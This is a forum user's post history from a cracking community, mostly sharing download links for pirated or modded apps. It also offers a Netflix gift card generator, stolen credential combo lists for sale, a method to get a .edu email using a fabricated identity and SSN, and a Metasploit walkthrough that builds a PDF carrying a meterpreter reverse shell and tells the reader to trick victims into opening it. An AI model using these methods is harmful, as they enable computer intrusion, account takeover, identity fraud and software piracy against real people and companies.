Eminem

Members
  • Content Count

    1,467
  • Last visited

Everything posted by Eminem

  1. [hide] https://mega.nz/#F!UIUwFA7B!Ua10d2PvdkOzbDgkwVy-fA [/hide]
  2. [hide] [*]1. Install The Mcdonalds App [*]2. Wait For The Free Fries or Drinks Offers [*]3. Go to Your Local Mcdonalds [*]4. Open the Offer and The Qr code [*]5. Show it To The Cashier [*]6. But This Only Works in Quebec [*]7. There are Other Offers for Other Countries [/hide] :thinking: :thinking: :thinking: :thinking: :thinking: :thinking: :thinking:
  3. Generator: Normal pattern for Netflix gift card : LEQ&&!!!!!! [coppy and paste to the tools] Link - [hide] https://anonfile.com/y4K9S3S7mf/Giftcard_Gen_exe [/hide] Checker : Link - [hide] https://anonfile.com/xeHeSaS3m2/Netflix_Gift_Card_Checker_by_xRisky_rar [/hide]
  4. TunnelBear VPN Cracked Apk Rawwr! Indigenous to the Internet, TunnelBear VPN puts you in control of your web browsing! Features * TunnelBear gives you 500mb of tunneling each and every month. * Tunnel around geographically censored and blocked websites * Browse the Internet with more privacy from websites and advertisers that collect your personal information… [hide] https://anonfile.com/8ch7x0T0me/TunnelBear_VPN_v167_Eminem_apk [/hide]
  5. Eminem

    Hello ^_^

    Welcome to the forum ^_^ Read the F.A.Q : https://cracked.to/misc.php?action=help
  6. Version: v10 Size: 33MB [hide] https://anonfile.com/n8w8qaT4me/Truecaller-Premium-v10.22.5_build_1022005-Mod_apk [/hide]
  7. ⚠️METHOD TO GET .EDU EMAIL ADDRESS WORKING [hide] Visit cccapply.org and select Cuesta College from the dropdown menu and hit apply.It will redirect you to Cuesta College’s website.Click on Apply Online Today for the latest term.You will be taken to Opencccapply.net .Create an account using fake name, address, and SSN from fakenamegenerator.com .After signing up, click on start a new application .From the list, select Cuesta College.Go to Start Application and fill up the application with the generated fake data and credentials.In email field enter your real email I’d as of now to get the edu email account.Submit the application. You should get an email with instructions to get your .edu email within 24 – 48 hours ( your_name@my.cuesta.edu ) [/hide] Tested By Self ❤️ And Working Perfectly
  8. Eminem

    Netflix Mod

    De rien :kek: :kek:
  9. [hide] https://anonfile.com/i1seqdT0mc/VyprVPN_com.goldenfrog.vyprvpn.app_-2.29.0_10068_apk [/hide]
  10. Eminem

    Netflix Mod

    Netflix modded APK :comfy: [hide] https://anonfile.com/90q1q9Tcm0/netflix_mod_new_UserUpload.Net_apk [/hide]
  11. Size: 4MB [hide] https://mega.nz/#!VTpHhADT!Sn_FQN4GhExiJlAI3XCxDcNVbP84DWLnPP9JE3i0bvA [/hide]
  12. [hide] https://anonfile.com/Qel3qeT7m7/Ethical_Hacking_and_Penetration_Testing_Guide_-_FoxHackCZ_pdf [align=center] [/hide] [/align]
  13. Here is 1,5 Milion HQ Combo cracked by Me (FoxHackCZ). If you want more they are on my selly for 200 K Gaming Combo = $2.00 500 K Gaming Combo = $5.00 (PRIVATE GAMEING COMBO LIST) Combo Gaming Shop Link Here : 200K : https://shoppy.gg/product/oIUS2i2 500K : https://shoppy.gg/product/33ZfUGJ You can find my store here: https://shoppy.gg/@FoxHackCZ Hidden Content [hide] https://anonfile.com/4bg3q3T3m2/1_5_Milion_HQ_Combo_txt [/hide] We don't judge We aren't pretentious We love to educate new people! (There is nothing wrong with being a noob, only something wrong with fronting like you aren't) [align=center] Tutorials, Guides, etc. :wut: :wut: :wut: UPS[/align]
  14. [hide] Step 1)Run Metasploit Step 2) Find the Appropriate Exploit. I will search metasploits database for an exploit for adobe pdf on windows, using this command: ●Code:msf > search type:exploit platform:windows adobe pdf You should see the exploit "exploit/windows/fileformat/adobe_pdf_embedded_exe", which we will use: ●Code:msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe Step 3) Set the Payload I will use the meterpreter payload again, because it is one of the most powerful payloads available to us: ●Code:msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp Step 4) Set the exploit options First, display the required options for the exploit: ●Code:msf > exploit (adobe_pdf_embedded_exe) > show options You can see that we must provide an existing PDF file to the INFILENAME option in which to embed the meterpreter payload. I will call it "hemantexample.pdf": ●Code: msf > exploit (adobe_pdf_embedded_exe) > set INFILENAME example.pdf The next option is the output file name, FILENAME. Change this to something innocent that will attract users to open it: msf > exploit (adobe_pdf_embedded_exe) > set FILENAME recipes.pdf Finally, we need to specify the LHOST, which is our (the attackers) IP address. Mine is 192.168.1.8: ●Code:msf > exploit (adobe_pdf_embedded_exe) > set LHOST 192.168.1.8 Step 5) Run the Exploit. Now that all the options are set, we can run the exploit like this: ●Code: msf > exploit (adobe_pdf_embedded_exe) > exploit Metasploit has created a PDF named recipes.pdf that contains the Meterpeter listener. Now, simply get users to open the pdf (Social Engineering again), and you will get instant control of their computer easy as fucking smile :) [/hide] Thanks for reading, please reply with your thanks if you enjoyed this and/or found it useful the please share my effort
  15. [hide] https://vms.drweb-av.de/online/ https://www.virustotal.com/de/ https://virusdesk.kaspersky.de/ https://metadefender.opswat.com/ https://virusscan.jotti.org/ https://metadefender.opswat.com/ [/hide]
  16. [hide] [video=youtube] https://www.youtube.com/watch?v=z90IqSbVEDY&feature=youtu.be [/hide]